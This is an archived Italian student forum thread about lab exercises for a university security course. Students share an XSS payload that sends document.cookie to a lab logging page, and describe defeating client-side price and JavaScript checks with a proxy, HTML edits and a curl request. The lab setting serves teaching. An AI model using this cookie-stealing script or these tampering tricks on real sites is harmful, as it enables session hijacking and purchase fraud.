Homepage  Il progetto dsy.it è l'unofficial support site dei corsi di laurea del Dipartimento di Scienze dell'Informazione e del Dipartimento di Informatica e Comunicazione della Statale di Milano. E' un servizio degli studenti per gli studenti, curato in modo no-profit da un gruppo di essi. I nostri servizi comprendono aree di discussione per ogni Corso di Laurea, un'area download per lo scambio file, una raccolta di link e un motore di ricerca, il supporto agli studenti lavoratori, il forum hosting per Professori e studenti, i blog, e molto altro...
In questa sezione è indicizzato in textonly il contenuto del nostro forum


.dsy:it. .dsy:it. Archive > Didattica > Corsi N - Z > Sicurezza
 
Esercizi laboratorio
Clicca QUI per vedere il messaggio nel forum
edima
Qualcuno mi puo' spiegare come funziona questo esercizio?

http://giove.laser.dico.unimi.it/si...dden/hidden.php

Ho messo 0.1 o 0.5, come input, il valore del prezzo e' minore del valore unitario, ma l'esercizio dice che non l'ho superato..... Come si fa?

Non riesco a risolvere gli esecizi sul controllo Javascript, non riesco a passare il controllo delle regular expression.

-------------

Invece per la soluzione del primo esercizio sugli XSSho trovato questa stinga che risolve l'esercizio. Vi torna?

<SCRIPT>document.location='http://giove.laser.dico.unimi.it/sicurezza0809/xss1/log.php?cookie='+document.cookie</SCRIPT>

edima
Aiuto!!! Non riesco a passare manco questo esercizio! Mi quota tutti i caratteri speciali, non riesco ad imbrogliarlo. Qualcuno ha la soluzione?

http://giove.laser.dico.unimi.it/si...nome=%22ciao%22

Ciao! Grazie

pamarcan
Il primo dei due esercizi serve per mostrare la debolezza dei controlli fatti lato client.
Puoi usare o un proxy tipo webscarab o qualche plugin del browser che intercetti gli header http, insomma qualcosa che scavalchi i controlli fatti sul client.
Ad esempio: dopo aver impostato il browser verso il proxy (quindi su localhost) imposti il proxy di webscarab per intercettare gli headers, magari solo dal sito che t'interessa,
Così, inviando dal browser i dati ben formati (così da superare il controllo) webscarab li intercetterà, e potrai modificare i parametri passati come vorrai.

Per il secondo esercizio usi lo stesso metodo (proxy o simili), e inserisci tra i parametri passati che intercetti lo script in php (riferito però a quell'esercizio) che hai postato sopra.
(Attenzione che il parametro potrebbe essere anche passato tramite una form)

edima
Grazio 10000! Ho messo su webscrab ho modificato il parametro come hai detto, ed e' andato!!

Ho fatto anche quello javascript. Basta disabilitare il controllo javascript sostituendo:

<input type="button" onclick="javascript: controlla();" value="Invia">

con

<input type="submit" value="Invia">

Veramente grazie ancora!


Non riesco invece a superare i due esercizi XSS, quelli dove l'output dal server risulta filtrato. Secondo me per quelli c'e' da fare passare qualche sequenza sfruttando la differenza di encoding dei caratteri, in modo da fare ritornare dal sever caratteri tipo < o > o ". Ma non riesco a trovare la sequenza corretta. Ho provato con tutti i caratteri codice maggiore di 128 ma non fuziona...

edima
Ho risolto il primo esercizio con curl:

curl --anyauth --basic --user XXX:YYY --data "qt=12&prezzo=123&compra=Compra" http://giove.laser.dico.unimi.it/si...dden/hidden.php

XXX:YYY sono nome utente e password del laboratorio

Powered by: vbHome (lite) v4.1 and vBulletin v2.3.1 - Copyright ©2000 - 2002, Jelsoft Enterprises Limited
Mantained by dsy crew (email) | Collabora con noi | Segnalaci un bug | Archive | Regolamento |Licenze | Thanks | Syndacate